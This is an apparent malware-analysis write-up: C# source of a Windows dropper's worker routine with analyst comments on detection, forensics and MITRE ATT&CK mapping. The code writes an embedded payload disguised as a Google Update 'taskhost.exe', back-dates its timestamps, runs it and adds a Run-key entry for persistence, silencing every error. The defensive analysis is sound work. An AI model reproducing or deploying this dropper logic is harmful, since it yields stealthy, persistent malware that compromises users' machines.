/* dropper fragment - background worker to drop embedded resource */
// Analyst summary: BackgroundWorker DoWork handler of a dropper. In order, it
//   1. builds the path %LOCALAPPDATA%\Google\Update\taskhost.exe,
//   2. writes the embedded resource "dropper.taskhost.exe" to that path,
//   3. back-dates the file's last-write and creation times,
//   4. starts the written file, and
//   5. registers it under the current user's Run key.
// Neither `sender` nor `e` is read, so nothing is reported back to the caller through them.
// Every step sits inside an empty catch, so a failure at any stage is swallowed without a
// message or log entry originating from this method.
// Behaviour mapping (MITRE ATT&CK): T1036.005 masquerading by name/location,
// T1070.006 timestomp, T1547.001 registry Run key.
private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
{
try {
// pretend to be part of google update
// Detection: the target folder is per-user and writable without elevation. The genuine
// per-user Google updater also lives under this folder, so the path alone does not stand
// out; the file name and its signer are the better discriminators.
string outfile = Path.Combine(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Google"), "Update");
// innocent sounding name
// Detection: taskhost.exe is the name of a Windows system binary that normally runs from
// the System32 directory. A process or file with this name anywhere under a user profile
// is a high-signal hunt condition.
outfile = Path.Combine(outfile, "taskhost.exe");
// extract from embedded resource and write
// The payload is carried inside this assembly as the manifest resource
// "dropper.taskhost.exe"; that resource name is a static indicator when triaging the
// dropper binary itself. CopyStream is defined outside this fragment; presumably a plain
// stream-to-stream copy - confirm against the rest of the sample.
using (Stream input = Assembly.GetExecutingAssembly().GetManifestResourceStream("dropper.taskhost.exe"))
using (Stream output = File.Create(outfile))
{
CopyStream(input, output);
output.Close();
input.Close();
}
// give it a time in the past to avoid analysis of when it was dropped
// Both timestamps are set to roughly two months and 39.5 hours before the moment of the
// call (-2 months, -40 h, +33 min), each from its own DateTime.Now read, so creation and
// last-write land within a fraction of a second of each other. Last-access time is not
// touched here.
// Forensics: these managed calls change the timestamps an ordinary directory listing
// shows. On NTFS, cross-check against the $FILE_NAME attribute timestamps, the USN
// journal, the Run key's last-write time and process-creation logs to recover the real
// drop time. Sysmon Event ID 2 (file creation time changed) records this kind of change
// when it is enabled.
try {
File.SetLastWriteTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
File.SetCreationTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
} catch {}
// run it
// Detection: the first launch passes no arguments and the parent process is the dropper
// itself. Process-creation telemetry (Sysmon Event ID 1 / Security 4688) will show an
// image path under %LOCALAPPDATA%\Google\Update\ with this parent.
System.Diagnostics.Process.Start(outfile);
try {
// and make it run every login
// Persistence indicator: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name
// "Google Update Taskhost", data = the quoted payload path followed by " -update".
// Only the persisted command line carries "-update"; the initial launch above does not.
// A registry value-set event (Sysmon Event ID 13) on this key, or an autoruns audit of
// the user hive, surfaces the entry. HKCU is used, so the entry is per-user and is
// written without elevation.
Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
key.SetValue("Google Update Taskhost", "\"" + outfile + "\" -update");
} catch {}
}
catch {}
}